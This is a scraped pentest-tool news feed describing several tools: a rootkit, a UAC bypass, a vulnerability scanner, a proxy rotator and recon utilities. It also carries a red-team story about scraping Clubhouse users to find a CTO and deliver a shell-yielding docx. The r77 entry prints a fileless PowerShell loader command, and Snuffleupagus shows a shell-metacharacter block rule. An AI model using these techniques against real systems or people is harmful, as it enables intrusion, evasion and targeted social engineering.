Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

VAST - Visibility Across Space And Time

$
0
0


The network telemetry engine for data-driven security investigations.


Getting StartedInstallationDocumentationDevelopmentChangelogLicense and Scientific Use

Chat with us on Gitter, or join us on Matrix at #tenzir_vast:gitter.im.


Key Features
  • High-Throughput Ingestion: import numerous log formats over 100k events/second, including Zeek, Suricata, JSON, and CSV.

  • Low-Latency Queries: sub-second response times over the entire data lake, thanks to multi-level bitmap indexing and actor model concurrency. Particularly helpful for instant indicator checking over the entire dataset.

  • Flexible Export: access data in common text formats (ASCII, JSON, CSV), in binary form (MRT, PCAP), or via zero-copy relay through Apache Arrow for arbitrary downstream analysis.

  • Powerful Data Model and Query Language: the generic semi-structured data model allows for expressing complex data in a typed fashion. An intuitive query language that feels like grep and awk at scale enables powerful subsetting of data with domain-specific operations, such as top-k prefix search for IP addresses and subset relationships.

  • Schema Pivoting: the missing link to navigate between related events, e.g., extracting a PCAP for a given IDS alert, or locating all related logs for a given query.


Get VAST

Linux users can download our latest static binary release via browser or cURL.

curl -L -O https://storage.googleapis.com/tenzir-public-data/vast-static-builds/vast-static-latest.tar.gz

Unpack the archive. It contains three folders bin, etc, and share. To get started invoke the binary in the bin directory directly.

tar xfz vast-static-latest.tar.gz
bin/vast --help

To install VAST properly for your local user simly place the unpacked folders in /usr/local/.

FreeBSD and macOS users have to build from source. Clone the master branch to get the most recent version of VAST.

git clone --recursive https://github.com/tenzir/vast

Once you have all dependencies in place, build VAST with the following commands:

./configure
cmake --build build
cmake --build build --target test
cmake --build build --target integration
cmake --build build --target install

The installation guide contains more detailed and platform-specific instructions on how to build and install VAST.


Getting Started

Here are some commands to get a first glimpse of what VAST can do for you.

Start a VAST node:

vast start

Ingest Zeek logs of various kinds:

zcat *.log.gz | vast import zeek

Run a query over the last hour, rendered as JSON:

vast export json ':timestamp > 1 hour ago && (6.6.6.6 || 5353/udp)'

Ingest a PCAP trace with a 1024-byte flow cutoff:

vast import pcap -c 1024 < trace.pcap

Run a query over PCAP data, sort the packets by time, and feed them intotcpdump:

vast export pcap "sport > 60000/tcp && src !in 10.0.0.0/8" \
| ipsumdump --collate -w - \
| tcpdump -r - -nl

License and Scientific Use

VAST comes with a 3-clause BSD license. When referring to VAST in a scientific context, please use the following citation:

@InProceedings{nsdi16:vast,
author = {Matthias Vallentin and Vern Paxson and Robin Sommer},
title = {{VAST: A Unified Platform for Interactive Network Forensics}},
booktitle = {Proceedings of the USENIX Symposium on Networked Systems
Design and Implementation (NSDI)},
month = {March},
year = {2016}
}

You can download the paper from the NSDI '16 proceedings.

Developed with ❤️ by Tenzir




Short story about Clubhouse user scraping and social graphs

$
0
0


TL;DR

During this RedTeam testing, Hexway team used Clubhouse as a social engineering tool to find out more about their client’s employees.


UPDATE:

While Hexway were preparing this article for publication, cybernews.com reported: 1.3 million scraped user records leaked online for free

In this research, Hexway didn’t attack Clubhouse users and didn’t exploit any Clubhouse vulnerabilities



Intro

Hi!

RedTeam projects have become routine for many pentest companies quite a long time ago. In Hexway, we don’t do them a lot only because our main focus is our collaborative pentesting platform, Hive. But in this case, we couldn’t resist - the project seemed to be very interesting.

We won’t go into detail on the project itself but rather focus on one of its parts. So, in this ReadTeam testing, our goal was to compromise the computer of the CTO of a large financial organization, X corp. To achieve that, we needed the CTO to open a docx file with our payload. Naturally, the question was: what’s the best way to deliver that file?

Here are some obvious options: - Corporate email - LinkedIn - Facebook

Instead, we wanted to try something new. And that’s where Clubhouse comes in.


Clubhouse? What?!

Clubhouse is a voice-based social network. It was popular for a couple of weeks in February 2021.

At that time, Clubhouse offered us a few advantages: - Huge popularity - Users mostly sign up with their real names, photos, and links to other social media - It’s quite easy to get into a room with interesting people, who are often hard to reach through traditional channels like email, LinkedIn, etc. - Our experience tells us that people are suspicious of cold emails with attachments and don’t open them. But in the context of an informal social platform, they seem to be less alert, which is good for RedTeam.

  • Here’s the plan:
  • Sign up in Clubhouse
  • Find our target in Clubhouse
  • Wait until they participate in a room as a speaker
  • Join the room
  • Try to engage them in a conversation. Get them interested and move the conversation over to email
  • Send them an email with the attachment and payload
  • The target opens our docx
  • Profit!


First problems

First, we registered in Clubhouse. That was easy! We’re looking for our target … and find nothing. We couldn’t find them by their name or nicknames on other platforms. Unfortunately, you can’t search users by profile description or Twitter/Instagram accounts. So, they are not on Clubhouse? Maybe they have an Android? (when this article is written, 06.04.21, Clubhouse is officially available only for iOS)?


This is the way!

Okay, chin up. Our target could be using a fake name not to reveal themselves and participate in rooms dedicated to non-work-related topics. It’s time to find out. Let’s try to use the power of social graphs.

Here’s the new plan: - Find any X corp employee - Get their list of followers and their accounts - Get the list of users they follow and their accounts - Get the lists of users of the clubs these accounts are in - Filter all these users by “X corp” in the About profile section - Make social graphs to find our target in someone’s connections + invitation chains (down to the first Clubhouse users) + “following” connections + “follower” connections

To do all that, we have to parse Clubhouse. There’s no official API, so we used an unofficial API (thanks to stypr)!)

The library clubhouse-py is pretty easy to use, and we could set up a parser script in no time. Clubhouse returns the following json in response to the API-request get_profile

Warning! To demonstrate how graphs work, we’re not going to use real X corp employees’ data.

{
"user_profile":{
"user_id":4,
"name":"Rohan Seth",
"displayname":"",
"photo_url":"https://clubhouseprod.s3.amazonaws.com:443/4_b471abef-7c14-43af-999a-6ecd1dd1709c",
"username":"rohan",
"bio":"Cofounder at Clubhouse 👋🏽 (this app!) and Lydian Accelerator 🧬 (non profit for fixing genetic diseases)",
"twitter":"rohanseth",
"instagram":"None",
"num_followers":5502888,
"num_following":636,
"time_created":"2020-03-17T07:51:28.085566+00:00",
"follows_me":false,
"is_blocked_by_network":false,
"mutual_follows_count":0,
"mutual_follows":[],
"notification_type":3,
"invited_by_user_profile":"None",
"invited_by_club":"None",
"clubs":[],
"url":"https://www.joinclubhouse.com/@rohan",
"can_receive_direct_payment":true,
"direct_payment_fee_rate":0.029,
"direct_payment_fee_fixed":0.3
},
"success":true
}

Example 1. Get the information about the user chipik and all of their followers and followed the accounts.

 ~python3 clubhouse-graphs.py -u chipik --followers --following
|------------|-----------|-------------|--------------------------------------------------------------------------------------------|----------|------------------------|---------|-----------|-----------|-----------|------------|-----------------|
| user_id | name | displayname | photo_url | username | bio | twitter | instagram | followers | following | invited by | invited by name |
|------------|-----------|-------------|--------------------------------------------------------------------------------------------|----------|------------------------|---------|-----------|-----------|-----------|------------|-----------------|
| 1964245387 | Dmitry Ch | | https://clubhouseprod.s3.amazonaws.com:443/1964245387_428c3161-1d0e-456e-b2a7-66f82b143094 | chipik | - hacker | _chipik | | 110 | 96 | 854045411 | Al Fova |
| | | | | | - researcher | | | | | | |
| | | | | | - speaker | | | | | | |
| | | | | | | | | | | | |
| | | | | | Do things at hexway.io | | | | | | |
| | | | | | tg: @chpkk | | | | | | |
|------------|-----------|-------------|--------------------------------------------------------------------------------------------|----------|------------------------|---------|-----------|-----------|-----------|------------|-----------------|

Example 2. Get the list of the participants of “Cybersecurity Club”

~python3 clubhouse-graphs.py --group 444701692
[INFO ] Getting info about group Cybersecurity Club
[INFO ] Adding member: 1/750
[INFO ] Adding member: 2/750
...
[INFO ] Adding member: 749/750
Done!
Check file ch-group-444701692.html with group's users graph
That’s a graph for all the group members. When hovering over a node, we see the information about the user.



We’ve experimented with server request frequency to see if there are any request limits. A few times, we were temporarily blocked for “too frequent use of API”, but the block expired quickly. For all the time we spent testing, our account wasn’t permanently blocked.
A few days later, we had a base of 300,000 Clubhouse users somehow connected to X corp.
Now, we can search users by different patterns in their bio:

Example 3. Find all users who allegedly work/worked at the WIRED magazine and their followers and followed the accounts.

~python3 clubhouse-graphs.py --find_by_bio wired
[INFO ] Searching users with wired in bio
[INFO ] Adding 1/100
[INFO ] Adding 2/100
...
[INFO ] Adding 100/100
Done!
Find graph in ch-search-wired.html file
Here’s the interactive graph with user profiles.


wired


Example 4. Clubhouse invitation chain

To sign up in Clubhouse, you need an invitation from a Clubhouse user. We can use that fact as additional evidence of connections between accounts.

~ python3 clubhouse-graphs.py -I kevinmitnick
[INFO ] Getting invite graph for user kevinmitnick
Kevin Mitnick<--Maite Robles
Maite Robles<--Roni Broyde
Roni Broyde<--Alex Eick
Alex Eick<--Summer Elsayed
Summer Elsayed<--Dena Mekawi
Dena Mekawi<--Eric Parker
Eric Parker<--Global Mogul Chale
Kojo Terry Oppong<--Shaka Senghor
Shaka Senghor<--Andrew Chen
Done! Find graph in ch-invitechain-kevinmitnick.html file

Here’s the interactive graph of invitations leading us to Kevin Mitnick.

kevin-graph

Results

We collected the users, filtered them by jobs, and built a graph showing connections between them (followers, followed, invitations). Thus, we found a user with a dog on a scooter as their profile pic and no bio. This user is followed by almost all the found X corp employees but follows just one of them. Finally, the user’s name contained the target’s initials, so we felt safe to assume it’s them.
The hardest part is done. We followed the target from one account and used another one to engage them in a conversation in some small room.
Some social engineering magic, and we got their email. After a short chain of letters, we sent them the docx with a payload. A few hours later, we got a shell on their laptop. It’s done!

Takeaways

  • Do not limit yourself to “standard” social engineering channels.
  • Be careful with the information you put out on social media, especially if it concerns your current or previous employment.
  • Most likely, the popularity of Clubhouse has passed. But there are a lot of users with real data, which can be parsed easily. All that makes us think that someone could already have collected a database of Clubhouse users, and some time later it may end up leaked.
P.S. The scripts developed during this project are available in our repository Clubhouse dummy parser and graph generator (CDPaGG)











APSoft-Web-Scanner-v2 - Powerful Dork Searcher And Vulnerability Scanner For Windows Platform

$
0
0


APSoft Webscanner Version 2

new version of APSoft Webscanner Version 1


Software pictures





What can i do with this ?

with this software, you will be able to search your dorks in supported search engines and scan grabbed urls to find their vulnerabilities. in addition , you will be able to generate dorks, scan urls and saerch dorks separately when ever you want


Supported search engines
  • Google
  • Yahoo
  • Bing

Supported vulnerabilities
  • SQL Injection
  • XSS
  • LFI

Whats new in version 2 (most important updates) ?

adding custom payloads

you can edit payloads.json file which will be created when you open and close software once, and add payloads as much as you want , easier than drinking water


adding custom error checks

once a payload injected in url, software will looks for errors in new website source, you can also customize those errors too. what you have to do is easily edit payloadserror.json file which will be created when you open and close software once. you can also use regexes as error , with REIT|your regex here format


multy vulnerability check

in old version, you were not able to choose more than 1 vulnerabilites to check, but in v2, you can do this easily.


multy search engine grabber

in old version, you were not able to choose more than 1 saerchengines to saerch in, but in v2, you can do this easily.


memory management

we`ve added memory management to avoid lack of memory in your system


dork generator

you can generate dorks and save them very fast with your custom configurations and keywords. valid configuration format should contain {DORK} that will be replaced with each keyword in dork generation process


updates list (all)
  • new threading system based on microsoft task
  • using linq technology
  • dork generator part
  • ability to add regexes as payloads error
  • low usage
  • moving from WPF to Windows form (just because my designes are bad, contact me if you can do better)
  • ability to use scanner-graber separately and simultaneously
  • and ....

support / suggestion = ph09nixom@gmail.com - t.me/ph09nix

Leave a STAR if you found this usefull :)


ByeIntegrity-UAC - Bypass UAC By Hijacking A DLL Located In The Native Image Cache

$
0
0


Bypass User Account Control (UAC) to gain elevated (Administrator) privileges to run any program at a high integrity level. 


Requirements
  • Administrator account
  • UAC notification level set to default or lower

How it works

ByeIntegrity hijacks a DLL located in the Native Image Cache (NIC). The NIC is used by the .NET Framework to store optimized .NET Assemblies that have been generated from programs like Ngen, the .NET Framework Native Image Generator. Because Ngen is usually run under the current user with Administrative privileges through the Task Scheduler, the NIC grants modify access for members of the Administrators group.

The MicrosoftManagementConsole (MMC) Windows Firewall Snap-in uses the .NET Framework, and upon initializing it, modules from the NIC are loaded into the MMC process. The MMC executable uses AutoElevate, a mechanism Windows uses that automatically elevates a process’s token without UAC prompting.

ByeIntegrity hijacks a specific DLL located in the NIC named Accessibility.ni.dll. It writes some shellcode into an appropriately-sized area of padding located in the .text section of the DLL. The entry point of the DLL is then updated to point to the shellcode. Upon DLL load, the entry point (which is actually the shellcode) is executed. The shellcode calculates the address of kernel32!CreateProcessW, creates a new instance of cmd.exe running as an Administrator, and then simply returns TRUE. This is only for the DLL_PROCESS_ATTACH reason; all other reasons will immediately return TRUE.


UACMe

This attack is implemented in UACMe as method #63. If you want to try out this attack, please, use UACMe first. The attack is the same, however, UACMe uses a different method to modify the NIC. ByeIntegrity uses IFileOperation while UACMe uses ISecurityEditor. In addition, UACMe chooses the correct Accessibility.ni.dll for your system and preforms the system maintenance tasks if necessary (to generate the NIC components). ByeIntegrity simply chooses the first NIC entry that exists (which may/may not be the correct entry that MMC is using) and does not run the system maintenance tasks. ByeIntegrity contains significantly more code than UACMe, so reading the UACMe implementation will be much easier to understand than reading the ByeIntegrity code. Lastly, ByeIntegrity launches a child process during the attack whereas UACMe does not.

tl;dr: UACMe is simpler and more effective than ByeIntegrity, so use UACMe first.


Using the code

If you’re reading this then you probably know how to compile the source. Just note that this hasn’t been tested or designed with x86 in mind at all, and it probably won’t work on x86 anyways.

Just like UACMe, I will never upload compiled binaries to this repo. There are always people who want the world to crash and burn, and I'm not going to provide an easy route for them to run this on somebody else's computer and cause intentional damage. I also don't want script-kiddies to use this attack without understanding what it does and the damage it can cause.


Supported Versions

This attack works from Windows 7 (7600) up until the latest version of Windows 10.



Snuffleupagus - Security Module For Php7 And Php8 - Killing Bugclasses And Virtual-Patching The Rest!

$
0
0


Security module for php7 and php8 - Killing bugclasses and virtual-patching the rest!

Snuffleupagus is a PHP 7+ and 8+ module designed to drastically raise the cost of attacks against websites, by killing entire bug classes. It also provides a powerful virtual-patching system, allowing administrator to fix specific vulnerabilities and audit suspicious behaviours without having to touch the PHP code.


Key Features

Download

We've got a download page, where you can find packages for your distribution, but you can of course just git clone this repo, or check the releases on github.


Examples

We're providing various example rules, that are looking like this:

# Harden the `chmod` function
sp.disable_function.function("chmod").param("mode").value_r("^[0-9]{2}[67]$").drop();

# Mitigate command injection in `system`
sp.disable_function.function("system").param("command").value_r("[$|;&`\\n]").drop();

Upon violation of a rule, you should see lines like this in your logs:

[snuffleupagus][0.0.0.0][disabled_function][drop] The execution has been aborted in /var/www/index.php:2, because the return value (0) of the function 'strpos' matched a rule.

Documentation

We've got a comprehensive website with all the documentation that you could possibly wish for. You can of course build it yourself.


Thanks

Many thanks to the Suhosin project for being a huge source of inspiration, and to all our contributors.



3klCon - Automation Recon Tool Which Works With Large And Medium Scope

$
0
0


Full Automation Recon tool which works with Small and Medium scopes.

ّIt's recommended to use it on VPS, it'll discoversecrets and searching for vulnerabilities

So, Welcome and let's deep into it <3


Updates

Version 1.1, what's new? (Very Recommended)
  1. Fixing multiple issues with the used tools.
  2. Upgrading to python3
  3. Editing the tool's methedology, you can check it there :)
  4. Editing the selected tools, change some and use more tools
  5. Editing some processes to be as a user option like directory bruteforcing and port scan

Installation instructions

1. Befor ANY installation instruction: You MUST be the ROOT user

$ su -

Because some of tools and dependencies will need the root permission


2. Install required tools (You MUST run it even if you install the used tools)

chmod +x install_tools.sh

./install_tools.sh


3. Running tool (Preferred to use python2 not python3)

python 3klcon.py -t target.com


4. Check that you already installed the last version of GO because some tools require to be updated!

Notes

[+] If you face any problem at the installation process, check that:

1. You logged in as ROOT user not normal user 
2. Check that you installed the GO language and this path is exist /root/go/bin

[+] It will take almost 5 ~ 6 hours running if your target is a medium. So, be Patient or use VPS and sleep while running :)

[+] It will collect all the result into one directory with your target name

[+] Some of tools may need your reaction like entering your GitHub's 2FA or username, password, etc.


Tools useds
  1. Subfinder
  2. Assetfinder
  3. Altdns
  4. Dirsearch
  5. Httpx
  6. Waybackurls
  7. Gau
  8. Git-hound
  9. Gitdorks.sh
  10. Naabu
  11. Gf
  12. Gf-templetes
  13. Nuclei
  14. Nuclei-templets
  15. Subjack
  16. Port_scan.sh

Stay in touch <3

LinkedIn | Blog | Twitter



R77-Rootkit - Fileless Ring 3 Rootkit With Installer And Persistence That Hides Processes, Files, Network Connections, Etc...

$
0
0


Ring 3 rootkit

r77 is a ring 3 Rootkit that hides following entities from all processes:

  • Files, directories, junctions, named pipes, scheduled tasks
  • Processes
  • CPU usage
  • Registry keys & values
  • Services
  • TCP & UDP connections

It is compatible with Windows 7 and Windows 10 in both x64 and x86 editions.


Hiding by prefix

All entities where the name starts with "$77" are hidden.



Configuration System

The dynamic configuration system allows to hide processes by PID and by name, file system items by full path, TCP & UDP connections of specific ports, etc.



The configuration is stored in HKEY_LOCAL_MACHINE\SOFTWARE\$77config and is writable by any process without elevated privileges. The DACL of this key is set to grant full access to any user.

The $77config key is hidden when RegEdit is injected with the rootkit.


Installer

r77 is deployable using a single file "Install.exe". It installs the r77 service that starts before the first user is logged on. This background process injects all currently running processes, as well as processes that spawn later. Two processes are needed to inject both 32-bit and 64-bit processes. Both processes are hidden by ID using the configuration system.

Uninstall.exe removes r77 from the system and gracefully detaches the rootkit from all processes.


Child process hooking

When a process creates a child process, the new process is injected before it can run any of its own instructions. The function NtResumeThread is always called when a new process is created. Therefore, it's a suitable target to hook. Because a 32-bit process can spawn a 64-bit child process and vice versa, the r77 service provides a named pipe to handle child process injection requests.

In addition, there is a periodic check every 100ms for new processes that might have been missed by child process hooking. This is necessary because some processes are protected and cannot be injected, such as services.exe.


In-memory injection

The rootkit DLL (r77-x86.dll and r77-x64.dll) can be injected into a process from memory and doesn't need to be stored on the disk. Reflective DLL injection is used to achieve this. The DLL provides an exported function that when called, loads all sections of the DLL, handles dependency loading and relocations, and finally calls DllMain.


Fileless persistence

The rootkit resides in the system memory and does not write any files to the disk. This is achieved in multiple stages.

Stage 1: The installer creates two scheduled tasks for the 32-bit and the 64-bit r77 service. A scheduled task does require a file, named $77svc32.job and $77svc64.job to be stored, which is the only exception to the fileless concept. However, scheduled tasks are also hidden by prefix once the rootkit is running.

The scheduled tasks start powershell.exe with following command line:

[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)

The command is inline and does not require a .ps1 script. Here, the .NET Framework capabilities of PowerShell are utilized in order to load a C# executable from the registry and execute it in memory. Because the command line has a maximum length of 260 (MAX_PATH), there is only enough room to perform a simple Assembly.Load().EntryPoint.Invoke().




Stage 2: The executed C# binary is the stager. It will create the r77 service processes using process hollowing. The r77 service is a native executable compiled in both 32-bit and 64-bit separately. The parent process is spoofed and set to winlogon.exe for additional obscurity. In addition, the two processes are hidden by ID and are not visible in the task manager.



No executables or DLL's are ever stored on the disk. The stager is stored in the registry and loads the r77 service executable from its resources.

The PowerShell and .NET dependencies are present in a fresh installation of Windows 7 and Windows 10. Please review the documentation for a complete description of the fileless initialization.


Hooking

Detours is used to hook several functions from ntdll.dll. These low-level syscall wrappers are called by any WinAPI or framework implementation.

  • NtQuerySystemInformation
  • NtResumeThread
  • NtQueryDirectoryFile
  • NtQueryDirectoryFileEx
  • NtEnumerateKey
  • NtEnumerateValueKey
  • EnumServiceGroupW
  • EnumServicesStatusExW
  • NtDeviceIoControlFile

The only exception is advapi32.dll. Two functions are hooked to hide services. This is because the actual service enumeration happens in services.exe, which cannot be injected.


Test environment

The Test Console can be used to inject r77 to or detach r77 from individual processes.



Technical Documentation

Please read the technical documentation to get a comprehensive and full overview of r77 and its internals, and how to deploy and integrate it.


Project Page

bytecode77.com/r77-rootkit



Mubeng - An Incredibly Fast Proxy Checker And IP Rotator With Ease

$
0
0


An incredibly fast proxy checker& IP rotator with ease.

Features
  • Proxy IP rotator: Rotates your IP address for every specific request.
  • Proxy checker: Check your proxy IP which is still alive.
  • All HTTP/S methods are supported.
  • HTTP & SOCKSv5 proxy protocols apply.
  • All parameters & URIs are passed.
  • Easy to use: You can just run it against your proxy file, and choose the action you want!
  • Cross-platform: whether you are Windows, Linux, Mac, or even Raspberry Pi, you can run it very well.

Why mubeng?

It's fairly simple, there is no need for additional configuration.

mubeng has 2 core functionality:


1. Run proxy server as proxy IP rotation

This is useful to avoid different kinds of IP ban, i.e. bruteforce protection, API rate-limiting or WAF blocking based on IP. We also leave it entirely up to user to use proxy pool resources from anywhere.


2. Perform proxy checks

So, you don't need any extra proxy checking tools out there if you want to check your proxy pool.


Installation

Binary

Simply, download a pre-built binary from releases page and run!


Docker

Pull the Docker image by running:

▶ docker pull kitabisa/mubeng

Source

Using Go (v1.15+) compiler:

▶ GO111MODULE=on go get -u ktbs.dev/mubeng/cmd/mubeng
NOTE: The same command above also works for updating.

— or

Manual building executable from source code:

▶ git clone https://github.com/kitabisa/mubeng
▶ cd mubeng
▶ make build
▶ (sudo) mv ./bin/mubeng /usr/local/bin
▶ make clean

Usage

For usage, it's always required to provide your proxy list, whether it is used to check or as a proxy pool for your proxy IP rotation.


Basic
▶ mubeng [-c|-a :8080] -f file.txt [options...]

Options

Here are all the options it supports.

▶ mubeng -h
FlagDescription
-f, --file <FILE>Proxy file.
-a, --address <ADDR>:<PORT>Run proxy server.
-d, --daemonDaemonize proxy server.
-c, --checkTo perform proxy live check.
-t, --timeoutMax. time allowed for proxy server/check (default: 30s).
-r, --rotate <AFTER>Rotate proxy IP for every AFTER request (default: 1).
-v, --verboseDump HTTP request/responses or show died proxy on check.
-o, --output Log output from proxy server or live check.
-u, --updateUpdate mubeng to the latest stable version.
-V, --versionShow current mubeng version.

NOTES:
  • Rotations are counted for all requests, even if the request fails.
    • Rotation means random, NOT choosing a proxy after/increment from proxy pool. We do not set up conditions if a proxy has been used. So, there is no guarantee if your request reaches the N value (-r/--rotate) your IP proxy will rotate.
  • Daemon mode (-d/--daemon) will install mubeng as a service on the (Linux/OSX) system/setting up callback (Windows).
    • Hence you can control service with journalctl, service or net (for Windows) command to start/stop proxy server.
    • Whenever you activate the daemon mode, it works by forcibly stop and uninstalling the existing mubeng service, then re-install and starting it up in daemon.
  • Verbose mode (-v/--verbose) and timeout (-t/--timeout) apply to both proxy check and proxy IP rotation actions.
  • HTTP traffic requests and responses is displayed when verbose mode (-v/--verbose) is enabled, but
    • We DO NOT explicitly display the request/response body, and
    • All cookie values in headers will be redacted automatically.
  • If you use output option (-o/--output) to run proxy IP rotator, request/response headers are NOT written to the log file.
  • A timeout option (-t/--timeout) value is a possibly signed sequence of decimal numbers, each with optional fraction and a unit suffix, such as "5s", "300ms", "-1.5h" or "2h45m".
    • Valid time units are "ns", "us" (or "µs"), "ms", "s", "m", and "h".

Examples

For example, you've proxy pool (proxies.txt) as:

http://127.0.0.1:8080
https://127.0.0.1:3128
socks5://127.0.0.1:2121
...
...

Because we use auto-switch transport, mubeng can accept multiple proxy protocol schemes at once.
Please refer to documentation for this package.


Proxy checker

Pass --check flag in command to perform proxy checks:

▶ mubeng -f proxies.txt --check --output live.txt

The above case also uses --output flag to save a live proxy into file (live.txt) from checking result.


(Figure: Checking proxies mubeng with max. 5s timeout)


Proxy IP rotator

Furthermore, if you wish to do proxy IP rotator from proxies that are still alive earlier from the results of checking (live.txt)(or if you have your own list), you must use -a(--address) flag instead to run proxy server:

▶ mubeng -a localhost:8089 -f live.txt -r 10

The -r(--rotate) flag works to rotate your IP for every N request value you provide (10).


(Figure: Running mubeng as proxy IP rotator with verbose mode)


Burp Suite Upstream Proxy

In case you want to use mubeng(proxy IP rotator) as an upstream proxy in Burp Suite, acting in-between Burp Suite and mubeng to the internet, so you don't need any additional extensions in Burp Suite for that. To demonstrate this:


(Figure: Settings Burp Suite Upstream Proxy to mubeng)

In your Burp Suite instance, select Project options menu, and click Connections tab. In the Upstream Proxy Servers section, check Override user options then press Add button to add your upstream proxy rule. After that, fill required columns (Destination host, Proxy host & Proxy port) with correct details. Click OK to save settings.


OWASP ZAP Proxy Chain

It acts the same way when you using an upstream proxy. OWASP ZAP allows you to connect to another proxy for outgoing connections in OWASP ZAP session. To chain it with a mubeng proxy server:


(Figure: Settings proxy chain connection in OWASP ZAP to mubeng)

Select Tools in the menu bar in your ZAP session window, then select the Options(shortcut: Ctrl+Alt+O) submenu, and go to Connection section. In that window, scroll to Use proxy chain part then check Use an outgoing proxy server. After that, fill required columns (Address/Domain Name & Port) with correct details. Click OK to save settings.


Limitations

Currently IP rotation runs the proxy server only as an HTTP protocol, not a SOCKSv5 protocol, even though the resource you have is SOCKSv5. In other words, the SOCKSv5 resource that you provide is used properly because it uses auto-switch transport on the client, but this proxy server DOES NOT switch to anything other than HTTP protocol.


Contributors

This project exists thanks to all the people who contribute. To learn how to setup a development environment and for contribution guidelines, see CONTRIBUTING.md.


Pronunciation

jv_ID/mo͞oˌbēNG/— mubeng-mubeng nganti mumet. (ꦩꦸꦧꦺꦁ​ꦔꦤ꧀ꦠꦶ​ꦩꦸꦩꦺꦠ꧀)


Changes

For changes, see CHANGELOG.md.




Httpx - A Fast And Multi-Purpose HTTP Toolkit Allows To Run Multiple Probers Using Retryablehttp Library, It Is Designed To Maintain The Result Reliability With Increased Threads

$
0
0


httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads.


Features
  • Simple and modular code base making it easy to contribute.
  • Fast And fully configurable flags to probe mutiple elements.
  • Supports multiple HTTP based probings.
  • Smart auto fallback from https to http as default.
  • Supports hosts, URLs and CIDR as input.
  • Handles edge cases doing retries, backoffs etc for handling WAFs.

Supported probes:-
ProbesDefault checkProbesDefault check
URLtrueIPtrue
TitletrueCNAMEtrue
Status CodetrueRaw HTTPfalse
Content LengthtrueHTTP2false
TLS CertificatetrueHTTP 1.1 Pipelinefalse
CSP HeadertrueVirtual hostfalse
Location HeadertrueCDNfalse
Web ServertruePathfalse
Web SockettruePortsfalse
Response TimetrueRequest methodfalse

Installation Instructions

From Binary

The installation is easy. You can download the pre-built binaries for your platform from the Releases page. Extract them using tar, move it to your $PATHand you're ready to go.

Download latest binary from https://github.com/projectdiscovery/httpx/releases

▶ tar -xvf httpx-linux-amd64.tar
▶ mv httpx-linux-amd64 /usr/local/bin/httpx
▶ httpx -h

From Source

httpx requires go1.14+ to install successfully. Run the following command to get the repo -

▶ GO111MODULE=on go get -v github.com/projectdiscovery/httpx/cmd/httpx

From Github
▶ git clone https://github.com/projectdiscovery/httpx.git; cd httpx/cmd/httpx; go build; mv httpx /usr/local/bin/; httpx -version

Usage
httpx -h

This will display help for the tool. Here are all the switches it supports.

FlagDescriptionExample
HCustom Header inputhttpx -H 'x-bug-bounty: hacker'
follow-redirectsFollow URL redirects (default false)httpx -follow-redirects
follow-host-redirectsFollow URL redirects only on same host(default false)httpx -follow-host-redirects
http-proxyURL of the proxy serverhttpx -http-proxy hxxp://proxy-host:80
lFile containing HOST/URLs/CIDR to processhttpx -l hosts.txt
no-colorDisable colors in the output.httpx -no-color
oFile to save output result (optional)httpx -o output.txt
jsonPrints all the probes in JSON format (default false)httpx -json
vhostProbes to detect vhost from list of subdomainshttpx -vhost
threadsNumber of threads (default 50)httpx -threads 100
http2HTTP2 probinghttpx -http2
pipelineHTTP1.1 Pipeline probinghttpx -pipeline
portsPorts ranges to probe (nmap syntax: eg 1,2-10,11)httpx -ports 80,443,100-200
titlePrints title of page if availablehttpx -title
pathRequest path/filehttpx -path /api
pathsRequest list of paths from filehttpx -paths paths.txt
content-lengthPrints content length in the outputhttpx -content-length
mlMatch content length in the outputhttpx -content-length -ml 125
flFilter content length in the outputhttpx -content-length -fl 0,43
status-codePrints status code in the outputhttpx -status-code
mcMatch status code in the outputhttpx -status-code -mc 200,302
fcFilter status code in the outputhttpx -status-code -fc 404,500
tech-detectPerform wappalyzer based technology detectionhttpx -tech-detect
tls-probeSend HTTP probes on the extracted TLS domainshttpx -tls-probe
tls-grabPerform TLS data grabbinghttpx -tls-grab
content-typePrints content-typehttpx -content-type
locationPrints location headerhttpx -location
csp-probeSend HTTP probes on the extracted CSP domainshttpx -csp-probe
web-serverPrints running web sever if availablehttpx -web-server
srStore responses to file (default false)httpx -sr
srdDirectory to store response (optional)httpx -srd httpx-output
unsafeSend raw requests skipping golang normalizationhttpx -unsafe
requestFile containing raw request to processhttpx -request
retriesNumber of retrieshttpx -retries
random-agentUse randomly selected HTTP User-Agent header valuehttpx -random-agent
silentPrints only results in the outputhttpx -silent
statsPrints statistic every 5 secondshttpx -stats
timeoutTimeout in seconds (default 5)httpx -timeout 10
verboseVerbose Modehttpx -verbose
versionPrints current version of the httpxhttpx -version
xRequest Method (default 'GET')httpx -x HEAD
methodOutput requested methodhttpx -method
response-timeOutput the response timehttpx -response-time
response-in-jsonInclude response in stdout (only works with -json)httpx -response-in-json
websocketPrints if a websocket is exposedhttpx -websocket
ipPrints the host IPhttpx -ip
cnamePrints the cname record if availablehttpx -cname
cdnCheck if domain's ip belongs to known CDNhttpx -cdn
filter-stringFilter results based on filtered stringhttpx -filter-string XXX
match-stringFilter results based on matched stringhttpx -match-string XXX
filter-regexFilter results based on filtered regexhttpx -filter-regex XXX
match-regexFilter results based on matched regexhttpx -match-regex XXX

Running httpx with stdin

This will run the tool against all the hosts and subdomains in hosts.txt and returns URLs running HTTP webserver.

▶ cat hosts.txt | httpx 

__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_| v1.0
/_/

projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.

https://mta-sts.managed.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://docs.hackerone.com
https://www.hackerone.com
https://resources.hackerone.com
https://api.hackerone.com
https://support.hackerone.com

Running httpx with file input

This will run the tool against all the hosts and subdomains in hosts.txt and returns URLs running HTTP webserver.

▶ httpx -l hosts.txt -silent

https://docs.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.managed.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://www.hackerone.com
https://resources.hackerone.com
https://api.hackerone.com
https://support.hackerone.com

Running httpx with CIDR input
▶ echo 173.0.84.0/24 | httpx -silent
